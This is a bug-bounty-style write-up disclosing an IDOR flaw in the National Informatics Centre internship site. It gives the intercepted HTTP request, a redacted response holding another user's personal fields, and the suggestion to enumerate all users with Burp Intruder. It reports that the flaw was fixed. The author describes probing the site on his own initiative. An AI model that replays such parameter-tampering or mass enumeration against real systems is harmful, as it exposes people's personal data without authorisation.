API authentication bypass on National Informatics Centre
Hey Hackers!!! My name is Krishnadev P Melevila. I am a 20-Year-old web application penetration tester. For more details search my name on Google.
Vulnerability: API Authentication Bypass
Impact: Zero Day
Risks: Sensitive data leak chained with IDOR
Priority: P0
Scope: Education details, Phone Number, Encrypted passwords, Tokens, Personal sensitive details
First of all, I will tell you how I came to this vulnerability.
As usual, I was surfing through Instagram, I came to know about a summer internship opportunity offered by National Informatics Centre through the website vidyakosh.nic.in. Without waiting anymore, I jumped into it for applying. But after filling out all stages of the application, It showed me a message that It is applicable only for 3rd Year students. As I am a first-year BTech. student, I am not eligible to apply for it.
So I become sad,
But, I never decided to step back, Instead turned on my hacker mode!!!
How i reached to this report?
I saw NIC Instagram post for the summer internship. Then I quickly ran to apply it. But unfortunately, the internship was for only 3rd-year BTech. students with 60% marks. I am 1st-year student. So I become disappointed. But my passion woke me up and started pentesting this site and reached to this vulnerability. This is my second bug at National Informatics Center. The first one was an IDOR on Kerala Civil Supplies Website developed by NIC.
Now read the technical report!
Steps to reproduce in attackers point of view
Step 1: While filling the fourth step of the application form intercept the request and you will get the request as below.
POST /public/internship/userdetails HTTP/1.1
Host: vidyakosh.nic.in Cookie: pop=1; laravel_cookie_consent=1; nic_lms_session=<REDACTED> XSRF-TOKEN=<REDACTED>
Content-Length: 56
Sec-Ch-Ua: “ Not A;Brand”;v=”99", “Chromium”;v=”99", “Google Chrome”;v=”99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Sec-Ch-Ua-Platform: “Windows”
Origin: https://vidyakosh.nic.in
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vidyakosh.nic.in/public/internship/internshipstep4 Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close userid=13&_token=<REDACTED>
Here, you can see a parameter called ‘userid’, If we change that to any other value other than ‘13’, We will get other users' data as below.
{“message”:[{“id”:1,”fname”:”Manish”,”active”:0,”email”:”<REDACTED>”,”email_otp”:””,”mobile”:”<REDACTED>",”mobile_otp”:””,”arn_no “:””,”gender”:”1",”password”:”<REDACTED>",”created_on”:”2022–04–01 16:32:11",”updated_on”:”2022–04–01 13:40:38",”dob”:”0000–00–00",”father_name”:””,”mother_name”:””,”state_id”:0 ,”dist_id”:0,”adress1":””,”adress2":””,”pin”:0,”session”:””,”s_year”:””,”st atement_purpose”:””,”photo”:””,”sign”:””,”project”:””,”education_pattern”:” “,”institute_category”:0,”institute_name”:””,”institute_adress”:””,”institu e_telephone”:””,”institute_email”:””,”bank_ac_no”:””,”bank_name”:””,”ifsc_c ode”:””,”branch_name”:””,”test”:””,”deleted_at”:null,”remember_token”:”<REDACTED>”,”pursuing_year”:” “,”form_submit_value”:0}]}Using any automation tool like burp intruder, We can fetch complete user's data including username and password.
Reported on: 03/04/2022
Partial fix released on: 03/04/2022
Complete fix released on: 04/04/2022
And the senior software engineer who attended my report needs a special shoutout as he is very dedicated. As soon as he received my message, He acted very fast and released the partial fix on the same night itself.
So that’s all guys,
Don’t forget to follow me on medium and other social media. Also please give your 50 claps for this write-up and that’s my inspiration to write more!!
I need your support to write more, Buy me a coffee pls: https://www.buymeacoffee.com/krishnadevpm
My Instagram handle: https://instagram.com/krishnadev_p_melevila
My Twitter handle: https://twitter.com/Krishnadev_P_M
My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/
My Personnel website: http://krishnadevpmelevila.com/
